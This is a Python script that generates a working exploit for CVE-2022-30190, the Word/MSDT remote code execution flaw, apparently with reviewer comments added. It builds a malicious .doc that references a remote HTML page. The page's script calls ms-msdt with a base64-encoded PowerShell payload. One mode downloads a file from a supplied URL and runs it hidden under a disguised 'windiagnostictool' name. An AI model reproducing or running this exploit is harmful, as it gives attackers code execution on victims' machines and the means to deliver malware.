CVE-2022-30190.py
import argparse
import base64
import os
import shutil
import random
import string
import tempfile
import shutil
import os
import random
import base64
import string
from urllib.parse import urlparse
def main(html_url: str, execution_payload: str, download_url: str) -> None:
    """Write the two proof-of-concept artifacts for CVE-2022-30190 under ./builds.

    Produces ./builds/document.doc (the ./doc template re-zipped after the
    ``{staged_html}`` placeholder in word/_rels/document.xml.rels is replaced
    by *html_url*) and ./builds/<basename of html_url's path> (the HTML page
    that external relationship points at).

    Args:
        html_url: URL where the generated HTML will be hosted; the basename of
            its path is reused as the local output file name.
        execution_payload: command string embedded when *download_url* is
            falsy (the ``--cmd`` value).
        download_url: when truthy this branch wins regardless of the caller's
            ``--downexec`` flag; *execution_payload* is then ignored.

    Exits with status 1 via the ``site`` builtin ``exit`` (``sys.exit`` is the
    conventional form) when the payload is empty or the HTML is under 4096
    bytes. Expects ./doc and ./builds to exist relative to the current working
    directory; the ``__main__`` block creates ./builds.
    """
    print("[@] Starting CVE-2022-30190 Generator...\n[•] Created by https://github.com/joshuavanderpoll")

    # Setup temp workpath / paths
    # NOTE(review): _get_default_tempdir/_get_candidate_names are private
    # tempfile internals, not public API. The directory is created by
    # copytree below and is never removed, so each run leaks a temp tree.
    work_dir = os.path.join(tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
    doc_path = os.path.join(work_dir, "doc")
    # doc_path is normally absolute, so os.path.join(work_dir, doc_path) just
    # yields doc_path again (presumably unintended, but harmless).
    shutil.copytree("doc", os.path.join(work_dir, doc_path))

    # Create exploited reference file
    # The relationships file is the only part of the template that changes:
    # the external target it carries is what ties the document to html_url.
    xml_path = os.path.join(work_dir, "./doc/word/_rels/document.xml.rels")
    with open(xml_path) as xml_file:
        xml_content = xml_file.read()

    xml_content = xml_content.replace("{staged_html}", html_url)
    with open(xml_path, "w") as xml_file:
        xml_file.write(xml_content)

    # make_archive appends ".zip" itself; the rename gives the archive the
    # .doc extension without changing its contents.
    shutil.make_archive("./builds/document", "zip", doc_path)
    os.rename("./builds/document.zip", "./builds/document.doc")
    # NOTE: the byte count printed here is len(xml_content), i.e. the size of
    # the edited .rels file, not the size of document.doc.
    print("[√] Exploited Word document saved in \""+"./builds/document.doc\" ("+str(len(xml_content.encode('utf-8')))+" bytes).")

    # Generate HTML payload dropper
    payload = ""
    if download_url:
        # file_ext is taken from the last dot-separated piece of the URL path;
        # a path without a dot yields the whole basename as the "extension".
        file_name = os.path.basename(urlparse(download_url).path)
        file_ext = file_name.split(".")[-1]
        payload = f"(New-Object System.Net.WebClient).DownloadFile(\"{download_url}\",\"$env:TEMP\windiagnostictool.{file_ext}\"); Start-Process -WindowStyle hidden (\"$env:TEMP\windiagnostictool.{file_ext}\"); taskkill /f /im msdt.exe;"
    else:
        payload = f"taskkill /f /im msdt.exe; {execution_payload};"

    # Both branches above assign a non-empty f-string, so this check cannot
    # trigger unless the branches are edited.
    if payload == "":
        print("[!] Empty payload received.")
        exit(1)

    payload_encoded = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
    html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{payload_encoded}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
    # Pads the page with 4096 random lowercase letters inside a trailing
    # comment; `random` is not a CSPRNG, which is fine here since the padding
    # is filler rather than a secret. The reason for the size floor is not
    # documented in this file.
    html_payload += ("".join([random.choice(string.ascii_lowercase) for _ in range(4096)]) + "\n</script>")

    # Check if file is required size
    # Always satisfied after the 4096-character padding above, so this branch
    # is effectively unreachable.
    if(len(html_payload.encode('utf-8')) < 4096):
        print("[!] Could not create HTML file higher than 4096 bytes.")
        exit(1)

    # Write final HTML file
    # NOTE(review): plain open/close rather than a `with` block, and no explicit
    # encoding; the byte count printed below assumes UTF-8 output.
    html_file_name = os.path.basename(urlparse(html_url).path)
    html_output = open("./builds/"+html_file_name, "w")
    html_output.write(html_payload)
    html_output.close()
    print("[√] Exploit HTML file saved in \""+"./builds/"+html_file_name+"\" ("+str(len(html_payload.encode('utf-8')))+" bytes).")
if __name__ == "__main__":
    # Command-line entry point: validate arguments, reset ./builds, run main().
    parser = argparse.ArgumentParser(description='Generate CVE-2022-30190 Word documents.')
    parser.add_argument('--html', type=str, help="URL to online exploit HTML file")
    parser.add_argument('--cmd', type=str, help="Command you want to execute on run")
    parser.add_argument('--downexec', help="Enable download and execute mode", default=False, action="store_true")
    parser.add_argument('--download_url', type=str, help="Source where to download and execute from")
    args = parser.parse_args()

    # --downexec without a source URL has nothing to download.
    if args.downexec and not args.download_url:
        print("[!] Please provide --download_url value when using --downexec.")
        exit(1)

    # Check arguments
    # NOTE(review): `args.html is None` is the idiomatic form; argparse leaves
    # the attribute as None when --html is omitted.
    if args.html == None:
        print("[!] Invalid --html argument.")
        exit(1)

    # A command is mandatory unless --downexec is set. --download_url is passed
    # to main() regardless of --downexec, and main() selects the download
    # branch whenever it is truthy, so --download_url without --downexec still
    # requires --cmd here but then ignores it.
    if not args.downexec and not args.cmd:
        print("[!] Invalid --cmd argument.")
        exit(1)

    # Setup folders
    # Destructive: any existing ./builds tree in the current directory is
    # removed before the output directory is recreated.
    if os.path.exists("./builds"):
        shutil.rmtree("./builds")
    os.mkdir("./builds")

    main(args.html, args.cmd, args.download_url)